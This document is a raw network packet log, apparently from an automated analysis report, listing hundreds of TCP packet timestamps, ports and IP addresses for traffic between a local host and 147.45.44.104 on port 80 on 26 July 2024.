Jul 26, 2024 18:56:49.208462954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208466053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208472967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208504915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208504915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208523989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208784103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208795071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208803892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208818913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208838940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208955050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208966970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208976030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208996058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209012032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209192038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209203005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209213018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209229946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209244967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209252119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209270954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209280968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209290028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209290981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209316969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209338903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209526062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209537983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209553957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209563971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209564924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209580898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209584951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209598064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209606886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209609985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209623098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209631920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209635973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209647894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209659100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209660053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209671021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209680080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209683895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209693909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209696054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209709883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209719896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209723949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209739923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209745884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209752083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209762096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209786892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209868908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209881067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209892035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209903002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209909916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209918022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209928989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209928989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209942102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209953070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209954977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209965944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209976912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.209980011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.209990025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210000992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210017920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210042000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210674047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210685015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210696936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210716009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210742950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210916042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210927010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210938931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210949898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210957050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210978031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.210988045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.210992098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211014986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211040020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211062908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211075068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211097002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211111069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211163044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211174965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211185932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211199045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211199999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211214066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211215973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211227894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211240053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211240053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211265087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211287975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211332083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211371899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211468935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211478949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211499929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211505890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211510897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211520910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211522102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211534023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211535931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211545944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211553097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211556911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211569071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211576939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211579084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211591959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211594105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211602926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211621046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211648941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211841106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211852074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211863995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211872101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.211877108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211890936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.211908102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.340939045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.340961933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.340972900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.340984106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.340993881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341005087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341017962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341039896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341082096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341092110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341392994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341403961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341413021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341423988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341434956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341438055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341445923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341459990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341470003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341470957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341481924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341490984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341515064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341540098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341547012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341559887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341583014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341598988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341706038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341717005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341726065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341736078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341744900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341747046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341758966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341768980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341769934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341779947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341787100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341790915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341803074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341811895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341814995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341823101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341835976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.341845036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341861010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.341883898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342621088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342632055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342641115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342652082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342662096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342662096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342673063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342683077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342689037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342694044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342705011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342708111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342716932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342725039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342729092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342741013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342741013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342767954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342771053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342782974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342792034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342792988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342807055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.342818022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.342843056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343005896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343018055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343028069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343039036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343043089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343050003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343059063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343065977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343079090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343086004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343092918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343111038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343111992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343122005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343132973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343137026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343151093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343154907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343163967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343178034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343180895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343189001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343199015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343199968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343225002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343247890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343935966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343949080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343957901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343967915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343976974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.343978882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.343990088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344002962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344003916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344019890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344019890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344032049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344043016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344043970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344057083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344068050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344069004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344079018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344084024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344089985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344101906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344110966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344113111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344135046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344150066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344742060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344753981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344763994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344774008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344784021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344784975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344794989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344805002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344814062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344815016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344825029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344831944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344836950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344847918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344850063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344861984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344871044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344875097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344882965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344894886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.344902992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344918013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.344939947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345459938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345470905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345482111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345494032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345504045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345504999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345515013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345525980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345531940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345536947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345547915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345549107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345558882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345566988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345571041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345582008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345582962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345596075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345606089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.345607042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345630884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.345645905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.416282892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416312933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416322947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416455984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.416800976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416811943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416821957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.416830063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.416845083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.416860104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.417560101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417602062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.417644024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417655945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417680979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.417695045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.417753935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417766094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417771101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417784929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.417805910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.417829037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418040037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418051004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418056011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418060064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418066025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418076992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418087959 CEST	80	49757	147.45.44.104	192.168.2.4
